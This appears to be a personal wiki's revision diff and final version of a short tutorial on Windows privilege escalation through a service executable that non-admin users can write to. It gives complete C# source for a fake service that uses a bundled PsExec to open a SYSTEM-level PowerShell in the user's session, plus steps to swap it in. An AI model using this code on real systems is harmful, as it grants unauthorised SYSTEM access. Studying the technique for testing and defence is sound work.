« Privilege escalation » : différence entre les versions
De Banane Atomic
Aller à la navigationAller à la recherche
(5 versions intermédiaires par le même utilisateur non affichées) | |||
Ligne 2 : | Ligne 2 : | ||
= [https://blog.didierstevens.com/2017/09/05/abusing-a-writable-windows-service/ With a writable Windows service] = | = [https://blog.didierstevens.com/2017/09/05/abusing-a-writable-windows-service/ With a writable Windows service] = | ||
If the executable of a Windows service is writable by non-admin users, you can replace it with another executable that will launch a command prompt in the system account. | If the executable of a Windows service is writable by non-admin users, you can replace it with another executable that will launch a command prompt in the system account. | ||
<filebox fn='FakeService.cs'> | |||
public class FakeService : ServiceBase | |||
{ | |||
protected override void OnStart(string[] args) | |||
{ | |||
Thread.Sleep(10000); // wait 10s for the user to log and Windows to start | |||
var psExecPath = ExtractPsExec(); // extract the PsExec.exe file | |||
var powershellPath = @"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe"; | |||
// Windows services run in session 0 and user account runs in session 1. | |||
// use sysinternals' PsExec to run cmd.exe in session 1. | |||
Process.Start(psExecPath, $"-accepteula -d -i 1 {powershellPath}"); | |||
// stop the service after 1s | |||
Thread.Sleep(1000); | |||
new Thread(() => this.Stop()).Start(); | |||
} | |||
private string ExtractPsExec() | |||
{ | |||
var psExecPath = Path.Combine(Path.GetTempPath(), "PsExec64.exe"); // temp path: C:\Windows\Temp | |||
if (!File.Exists(psExecPath)) | |||
File.WriteAllBytes(psExecPath, Resources.PsExec64); | |||
return psExecPath; | |||
} | |||
} | |||
</filebox> | |||
<filebox fn='Program.cs'> | <filebox fn='Program.cs'> | ||
class Program | |||
{ | |||
static void Main(string[] args) | |||
{ | |||
ServiceBase.Run(new ServiceBase[] { new FakeService() }); | |||
} | |||
} | |||
</filebox> | </filebox> | ||
Replace the executable of the Windows service by the compiled application. | # Replace the executable of the Windows service by the compiled application. | ||
A command prompt will be launched when the Windows service | # A command prompt will be launched when the Windows service starts. | ||
<kode lang='dos'> | <kode lang='dos'> | ||
whoami | whoami | ||
REM nt authority\system | REM nt authority\system | ||
</kode> | </kode> |
Dernière version du 20 février 2022 à 16:07
With a writable Windows service
If the executable of a Windows service is writable by non-admin users, you can replace it with another executable that will launch a command prompt in the system account.
FakeService.cs |
public class FakeService : ServiceBase { protected override void OnStart(string[] args) { Thread.Sleep(10000); // wait 10s for the user to log and Windows to start var psExecPath = ExtractPsExec(); // extract the PsExec.exe file var powershellPath = @"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe"; // Windows services run in session 0 and user account runs in session 1. // use sysinternals' PsExec to run cmd.exe in session 1. Process.Start(psExecPath, $"-accepteula -d -i 1 {powershellPath}"); // stop the service after 1s Thread.Sleep(1000); new Thread(() => this.Stop()).Start(); } private string ExtractPsExec() { var psExecPath = Path.Combine(Path.GetTempPath(), "PsExec64.exe"); // temp path: C:\Windows\Temp if (!File.Exists(psExecPath)) File.WriteAllBytes(psExecPath, Resources.PsExec64); return psExecPath; } } |
Program.cs |
class Program { static void Main(string[] args) { ServiceBase.Run(new ServiceBase[] { new FakeService() }); } } |
- Replace the executable of the Windows service by the compiled application.
- A command prompt will be launched when the Windows service starts.
whoami REM nt authority\system |